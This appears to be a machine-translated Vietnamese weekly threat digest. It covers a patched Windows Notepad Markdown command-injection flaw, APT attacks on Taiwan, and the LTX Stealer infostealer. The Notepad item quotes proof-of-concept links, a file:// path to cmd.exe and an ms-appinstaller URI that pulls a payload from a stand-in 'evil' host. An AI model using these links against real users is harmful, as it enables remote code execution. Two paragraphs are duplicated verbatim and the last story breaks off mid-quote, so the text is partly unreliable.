🔒 Bản tin ThreatsDay: AI Nhắc RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & hơn 25 câu chuyện

Hoạt động đe dọa trong tuần này cho thấy một tín hiệu nhất quán - những kẻ tấn công đang dựa nhiều hơn vào những gì đã hoạt động. Thay vì các hoạt động khai thác mới hào nhoáng, nhiều hoạt động được xây dựng xoay quanh việc âm thầm lạm dụng các công cụ đáng tin cậy, các quy trình làm việc quen thuộc và các hành vi bị bỏ qua ngay trước mắt.

📋 Nội dung chi tiết

Một sự thay đổi khác là cách đạt được quyền truy cập so với cách sử dụng quyền truy cập. Các điểm vào ban đầu ngày càng đơn giản hơn, trong khi hoạt động sau thỏa hiệp ngày càng trở nên có chủ ý, có cấu trúc và bền bỉ hơn. Mục tiêu không phải là sự gián đoạn mà là duy trì đủ lâu để thu được giá trị.

Ngoài ra còn có sự chồng chéo ngày càng tăng giữa tội phạm mạng, hoạt động gián điệp và xâm nhập cơ hội. Các kỹ thuật đang bị chảy máu giữa các nhóm, khiến việc phân bổ trở nên khó khăn hơn và các đường cơ sở phòng thủ trở nên kém tin cậy hơn.

Dưới đây là Bản tin về các mối đe dọa của tuần này - bản quét chặt chẽ các tín hiệu quan trọng, được chắt lọc thành các bản đọc nhanh. Mỗi mục sẽ bổ sung thêm bối cảnh nơi áp lực đe dọa đang hình thành tiếp theo.

Notepad RCE thông qua Markdown LinksMicrosoft đã vá một lỗ hổng chèn lệnh (CVE-2026-20841, điểm CVSS: 8.8) trong ứng dụng Notepad có thể dẫn đến việc thực thi mã từ xa. Microsoft cho biết: “Việc vô hiệu hóa không đúng cách các thành phần đặc biệt được sử dụng trong một lệnh ('chèn lệnh') trong Ứng dụng Windows Notepad cho phép kẻ tấn công trái phép thực thi mã qua mạng". Kẻ tấn công có thể khai thác lỗ hổng này bằng cách lừa người dùng nhấp vào liên kết độc hại bên trong tệp Markdown được mở trong Notepad, khiến ứng dụng chạy các tệp từ xa. “Mã độc hại sẽ thực thi trong bối cảnh bảo mật của người dùng đã mở tệp Markdown, cấp cho kẻ tấn công các quyền tương tự như người dùng đó”, gã khổng lồ công nghệ cho biết thêm. Khai thác bằng chứng khái niệm (PoC) cho thấy lỗ hổng này có thể được kích hoạt bằng cách tạo tệp Markdown có liên kết "file://" trỏ đến các tệp thực thi ("file://C:/windows/system32/cmd.exe") hoặc chứa các URI đặc biệt ("ms-appinstaller://?source=https://evil/xxx.appx") để chạy tải trọng tùy ý. Sự cố đã được khắc phục trong bản cập nhật Bản vá thứ Ba hàng tháng trong tuần này. Microsoft đã thêm hỗ trợ Markdown cho Notepad trên Windows 11 vào tháng 5 năm ngoái.

🔍 Thông tin bổ sung

Microsoft đã vá một lỗ hổng chèn lệnh (CVE-2026-20841, điểm CVSS: 8,8) trong ứng dụng Notepad có thể dẫn đến việc thực thi mã từ xa. Microsoft cho biết: “Việc vô hiệu hóa không đúng cách các thành phần đặc biệt được sử dụng trong một lệnh ('chèn lệnh') trong Ứng dụng Windows Notepad cho phép kẻ tấn công trái phép thực thi mã qua mạng". Kẻ tấn công có thể khai thác lỗ hổng này bằng cách lừa người dùng nhấp vào liên kết độc hại bên trong tệp Markdown được mở trong Notepad, khiến ứng dụng chạy các tệp từ xa. “Mã độc hại sẽ thực thi trong bối cảnh bảo mật của người dùng đã mở tệp Markdown, cấp cho kẻ tấn công các quyền tương tự như người dùng đó”, gã khổng lồ công nghệ cho biết thêm. Khai thác bằng chứng khái niệm (PoC) cho thấy lỗ hổng này có thể được kích hoạt bằng cách tạo tệp Markdown có liên kết "file://" trỏ đến các tệp thực thi ("file://C:/windows/system32/cmd.exe") hoặc chứa các URI đặc biệt ("ms-appinstaller://?source=https://evil/xxx.appx") để chạy tải trọng tùy ý. Sự cố đã được khắc phục trong bản cập nhật Bản vá thứ Ba hàng tháng trong tuần này. Microsoft đã thêm hỗ trợ Markdown cho Notepad trên Windows 11 vào tháng 5 năm ngoái.

Áp lực APT tăng cường ở Đài LoanTeamT5 cho biết đã theo dõi hơn 510 hoạt động đe dọa dai dẳng (APT) nâng cao ảnh hưởng đến 67 quốc gia trên toàn cầu vào năm 2025, trong đó có 173 cuộc tấn công nhắm vào Đài Loan. Các nhà cung cấp dịch vụ an ninh cho biết: “Vai trò của Đài Loan trong các căng thẳng địa chính trị và các giá trị trong chuỗi cung ứng công nghệ toàn cầu khiến nước này đặc biệt dễ bị tổn thương trước những kẻ thù đang tìm kiếm thông tin tình báo hoặc khả năng tiếp cận lâu dài để đạt được các mục tiêu chính trị và quân sự”. “Đài Loan không chỉ là một mục tiêu – nó còn hoạt động như một nơi thử nghiệm, nơi các APT liên kết với Trung Quốc thử nghiệm và tinh chỉnh các chiến thuật của họ trước khi mở rộng chúng sang các môi trường khác.”

TeamT5 cho biết đã theo dõi hơn 510 hoạt động đe dọa dai dẳng (APT) nâng cao ảnh hưởng đến 67 quốc gia trên toàn cầu vào năm 2025, trong đó có 173 cuộc tấn công nhắm vào Đài Loan. Các nhà cung cấp dịch vụ an ninh cho biết: “Vai trò của Đài Loan trong các căng thẳng địa chính trị và các giá trị trong chuỗi cung ứng công nghệ toàn cầu khiến nước này đặc biệt dễ bị tổn thương trước những kẻ thù đang tìm kiếm thông tin tình báo hoặc khả năng tiếp cận lâu dài để đạt được các mục tiêu chính trị và quân sự”. “Đài Loan không chỉ là một mục tiêu – nó còn hoạt động như một nơi thử nghiệm, nơi các APT liên kết với Trung Quốc thử nghiệm và tinh chỉnh các chiến thuật của họ trước khi mở rộng chúng sang các môi trường khác.”

Kẻ đánh cắp Node.js tấn công WindowsMột kẻ đánh cắp thông tin Node.js mới có tên LTX Stealer đã được phát hiện trong tự nhiên. Nhắm mục tiêu vào các hệ thống Windows và được phân phối thông qua trình cài đặt Inno Setup bị xáo trộn nghiêm trọng, phần mềm độc hại tiến hành thu thập thông tin xác thực quy mô lớn từ các trình duyệt dựa trên Chrome, nhắm mục tiêu vào các tạo phẩm liên quan đến tiền điện tử và xử lý dữ liệu được thu thập để lấy cắp. "Chiến dịch này dựa trên cơ sở hạ tầng quản lý dựa trên đám mây, trong đó Supabase được sử dụng riêng làm lớp xác thực và kiểm soát truy cập cho bảng điều khiển, trong khi Cloudflare được tận dụng cho phần phụ trợ phía trước.

📌 Kết luận

Đây là một sự kiện đáng chú ý trong lĩnh vực an ninh mạng. Người dùng và doanh nghiệp cần cập nhật các biện pháp bảo mật để bảo vệ hệ thống của mình.